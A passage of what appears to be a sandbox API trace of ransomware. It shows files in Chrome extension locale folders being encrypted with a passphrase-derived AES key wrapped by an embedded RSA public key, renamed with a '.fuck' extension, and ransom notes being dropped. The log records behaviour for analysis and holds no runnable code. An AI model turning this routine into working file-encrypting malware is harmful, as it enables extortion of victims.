Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.779] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.780] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.782] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.782] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.782] CryptHashData (hHash=0x2e186a8, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.782] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.782] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.782] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.782] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13080) returned 1 [0255.783] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13080, dwCertEncodingType=0x1, pInfo=0x2e2a240*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a270*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a278*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e19568) returned 1 [0255.783] CryptEncrypt (in: hKey=0x2e19568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.783] CryptEncrypt (in: hKey=0x2e19568, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e132a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e132a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.783] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e132a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e132a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.784] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x115, lpOverlapped=0x0) returned 1 [0255.785] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x115, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0255.785] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0255.786] CloseHandle (hObject=0x5d60) returned 1 [0255.786] CloseHandle (hObject=0x5d5c) returned 1 [0255.786] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0255.789] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0255.790] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0255.791] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0255.792] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0255.792] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.792] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.792] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.792] FindClose (in: hFindFile=0x2e18828 | out: hFindFile=0x2e18828) returned 1 [0255.792] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0255.792] AreFileApisANSI () returned 1 [0255.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.793] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.794] GetFileType (hFile=0x5d50) returned 0x1 [0255.794] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.795] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.795] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e186a8 [0255.795] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.795] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.795] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.795] GetLastError () returned 0x0 [0255.795] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json")) returned 0x20 [0255.796] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json", dwFileAttributes=0x80) returned 1 [0255.796] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.797] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.797] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.797] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.800] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.800] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.800] CryptHashData (hHash=0x2e18828, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.800] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.800] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.800] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.800] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13108) returned 1 [0255.800] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13108, dwCertEncodingType=0x1, pInfo=0x2e29470*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e294a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e294a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e195a8) returned 1 [0255.801] CryptEncrypt (in: hKey=0x2e195a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.801] CryptEncrypt (in: hKey=0x2e195a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13328*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e13328*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.801] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e13328*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e13328*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0255.802] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x177, lpOverlapped=0x0) returned 1 [0255.803] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x177, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x180) returned 1 [0255.803] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x180, lpOverlapped=0x0) returned 1 [0255.803] CloseHandle (hObject=0x5d5c) returned 1 [0255.803] CloseHandle (hObject=0x5d60) returned 1 [0255.804] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), bFailIfExists=0) returned 1 [0255.807] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json", dwFileAttributes=0x0) returned 1 [0255.807] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.gsg")) returned 1 [0255.809] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\messages.json.fuck")) returned 1 [0255.811] CryptDestroyHash (hHash=0x2e18828) returned 1 [0255.811] CryptDestroyKey (hKey=0x2e18128) returned 1 [0255.811] CryptReleaseContext (hProv=0x2e176a0, dwFlags=0x0) returned 1 [0255.811] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0255.811] FindClose (in: hFindFile=0x2e186a8 | out: hFindFile=0x2e186a8) returned 1 [0255.811] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\readme_back_files.htm")) returned 0xffffffff [0255.811] AreFileApisANSI () returned 1 [0255.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0255.811] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ur\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0255.812] GetFileType (hFile=0x5d50) returned 0x1 [0255.812] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0255.813] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0255.813] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18828 [0255.814] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.814] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0255.814] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0255.814] GetLastError () returned 0x0 [0255.815] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json")) returned 0x20 [0255.815] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0255.815] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0255.816] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0255.817] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0255.818] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0255.820] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0255.820] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0255.820] CryptHashData (hHash=0x2e186a8, pbData=0x28cb3a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0255.820] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0255.820] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0255.820] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0255.821] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e12338) returned 1 [0255.821] CryptImportPublicKeyInfo (in: hCryptProv=0x2e12338, dwCertEncodingType=0x1, pInfo=0x2e2a580*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e2a5b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e2a5b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e195e8) returned 1 [0255.821] CryptEncrypt (in: hKey=0x2e195e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0255.821] CryptEncrypt (in: hKey=0x2e195e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e123c0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e123c0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0255.821] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e123c0*, nNumberOfBytesToWrite=0x80, 